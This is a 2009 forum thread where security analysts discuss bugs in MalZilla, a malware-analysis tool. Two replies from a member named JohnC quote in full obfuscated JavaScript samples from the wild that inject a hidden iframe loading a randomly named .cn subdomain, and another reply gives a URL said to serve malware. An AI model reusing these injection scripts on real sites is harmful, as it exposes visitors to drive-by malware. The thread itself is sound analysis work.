Author Topic: MalZilla  (Read 256156 times)

0 Members and 1 Guest are viewing this topic.

June 08, 2009, 10:04:50 pm
Reply #270

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I forgot to mention btw Bobby, the DLL issue I was having (showed up whenever Malzilla was launched) - I fixed it eventually (accidentally) by uninstalling the MS Visual C++ runtime ..... (bit wierd, but it worked)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 09, 2009, 06:57:26 pm
Reply #271

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Looks like a conflict between various version of the same DLL.

June 09, 2009, 07:18:33 pm
Reply #272

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe yep :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 11, 2009, 10:54:44 am
Reply #273

Cyborg

  • Newbie

  • Offline
  • *

  • 5
Hi Cyborg and welcome.

Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.

Do you use Clipboard Monitor (option from tray icon)?

Hi Bobby, nice to meet you here.

Version : 1.2.0


I downloaded it from the sourceforge website only 2-3 weeks ago.

And no, I'm using the right click option from inside MalZilla.

By the way, I don't know why, whenever I open MalZilla, I'm getting this error :



However, it does not seem to be affecting the way MalZilla works. I've tried replacing the shortcut by deleting the original files and unzipping MalZilla again. That did not fix the issue.

By the way, I'm on Vista Home Premium.

Reg,
Cyborg

June 11, 2009, 01:23:57 pm
Reply #274

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hi Cyborg,

I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.

June 11, 2009, 08:40:00 pm
Reply #275

Cyborg

  • Newbie

  • Offline
  • *

  • 5
Hey Bobby :)

Quote
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

It has a check placed on it. But the clipboard doesn't work. It doesn't copy normal text either.

Quote
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.

No, I don't have a copy of libeay32.dll in system32. And no, I'm not able to open any https websites (isn't this a known problem on Vista?). I get this in the lower pane :

Quote
=========================
Server IP(s):
0.0.0.0

=========================
HTTP headers:

GET / HTTP/1.0
Host: webparent.sabis.net:443
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.9 (KHTML, like Gecko) Safari/521.9
Accept-Encoding: gzip

Above is a working example of the website : https://webparent[dot]sabis[dot]net

June 11, 2009, 09:13:21 pm
Reply #276

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Cyborg,
Go to Add/Remove Programs (Programs and Features on Vista), and uninstall the Microsoft Visual C++ Runtime ....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 11, 2009, 09:27:49 pm
Reply #277

Cyborg

  • Newbie

  • Offline
  • *

  • 5
Thanks a lot Steven, that seems to have fixed the DLL issue.
Seems like you had already posted the solution before...

Anyways, got any idea about the clipboard issue?
Does anybody else have the same problem??

June 11, 2009, 10:09:27 pm
Reply #278

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've had the issue when copy/pasting from the shellcode/hex view, but not the rest of the program. When the problem occurs I either have it save the results, or use "Copy selection ...."
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 18, 2009, 08:17:07 pm
Reply #279

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Code: [Select]
function LApySnWQkMr(){};LApySnWQkMr.prototype = {getRandString : function(){var l=16,c='0Y1R2Y3R4F5R6Y7)8R9FaYb}cRdFeFf}'.replace(/[\)F\}YR]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},path:String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110),alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},install : function(){if(!this.alreadyInstalled()){var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehCtPmelC>e<LbPoedUyP>L'.replace(/[PULCe]/g, '')+s+'<C/$b$oCdCy~>n<C/~h~tCm$lC>$'.replace(/[Cp\$n~]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},cookieValue:1,setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/may.cn/',cookieName:'gfcehdba'};var ocho=new LApySnWQkMr();ocho.install();

Format Code, will break a string or something in the code above and stop it from working as it should.

June 19, 2009, 10:39:15 pm
Reply #280

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Here is another example of that will decode, but when you use Format Code, it will no longer decode.

Code: [Select]
function yhIUKrxFqo(){};yhIUKrxFqo.prototype = {host:'/qq.cn/',install : function(){if(!this.alreadyInstalled()){var s="<_d_i3v1 GsFtGy_l3eF=F\'Gd_iGsGp3l3aFy1:Fn1o3n1e3\'_>F<FiGf3rFaFm1e_ Gs3rFc_=1\'F".replace(/[_1G3F]/g, '')+this.getFrameURL()+"\'J>q<q/qiJfRr@aRmqeJ>@<q/@dRiqvJ>q".replace(/[@J0qR]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehetsmvls>e<rbroZdsyr>s'.replace(/[srevZ]/g, '')+s+'<{/rbPokdFyr>r<r/FhFtkmrlr>P'.replace(/[\{rkPF]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c='0m1j2m3z4{5m6m7j8J9maJbzc{dmeJfz'.replace(/[\{jzmJ]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieValue:1,getFrameURL : function(){var dlh=''; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},path:String.fromCharCode(102)+"q"+new String("w")+String.fromCharCode(101)+String.fromCharCode(114)+new String("z")+"."+new String("c")+new String("n"),cookieName:'chfeabgd',alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); }};var ocho=new yhIUKrxFqo();eval(ocho.getFrameURL());
 

June 20, 2009, 06:45:45 am
Reply #281

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
This one sends Malzilla into a permanent 302 ....... (unless autofollowing redirects is disabled of course);

Code: [Select]
http://www.fucking-cash.com/index.com?a=3546&p=2
p= is valid from 1 up to lord knows where (highest I've found so far is 15, all seem to be serving malware (haven't analyzed it in detail yet))

/edit

Okie, after stopping Malzilla doing an auto 302, those < 10 are intermittent between perma redirects back to itself, and redirects to other sites. Those > 10 (and so far the number doesn't seem to be limited) all lead to porn sites. The reason I thought it was malware is that it was actually serving the file as application/x-msdownload, which meant Malzilla was treating the redirect URL as an actual file - looking at the source code for some of them, this does not seem to be the case - they just seem to be regular porn sites.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 20, 2009, 01:49:51 pm
Reply #282

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Malzilla treats some content as binary file (and triggers Save dialog) only if one of the following lines/strings are present in HTTP headers:
'Content-Type: application'
'Content-Disposition:'

Malzilla will follow redirections for every HTTP response in the range between 300 and 399. It does not distinguish between e.g. 300 and 302 responses.
Redirection is done according to the following line in HTTP headers if present (it should be present for every 3xx response):
'Location:'

One more type of redirection that Malzilla will follow is the one with response 200 and with 'Refresh:' line in HTTP headers.

June 20, 2009, 02:10:09 pm
Reply #283

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
@MysteryFCM

Indeed, these HTTP headers are driving Malzilla nuts.
'Location:' is empty, and that triggers Malzilla to treat is as a relative URL, which means that the absolute URL will be the same like the current URL.
The 'ContentType:' will trigger the save dialog because it contains 'application' string; and redirection (e.g. 302) in Malzilla does not exclude a possibility of getting a download (binary) in the same turn. This would be my mistake in codding the HTTP headers parser.

Interesting.
It makes me thinking that someone made this just to explore Malzilla's HTTP headers parser system :)

June 20, 2009, 04:01:38 pm
Reply #284

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe because of the way it behaved, I figured it was probably done deliberately to try and avoid automated analysis as much as possible.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net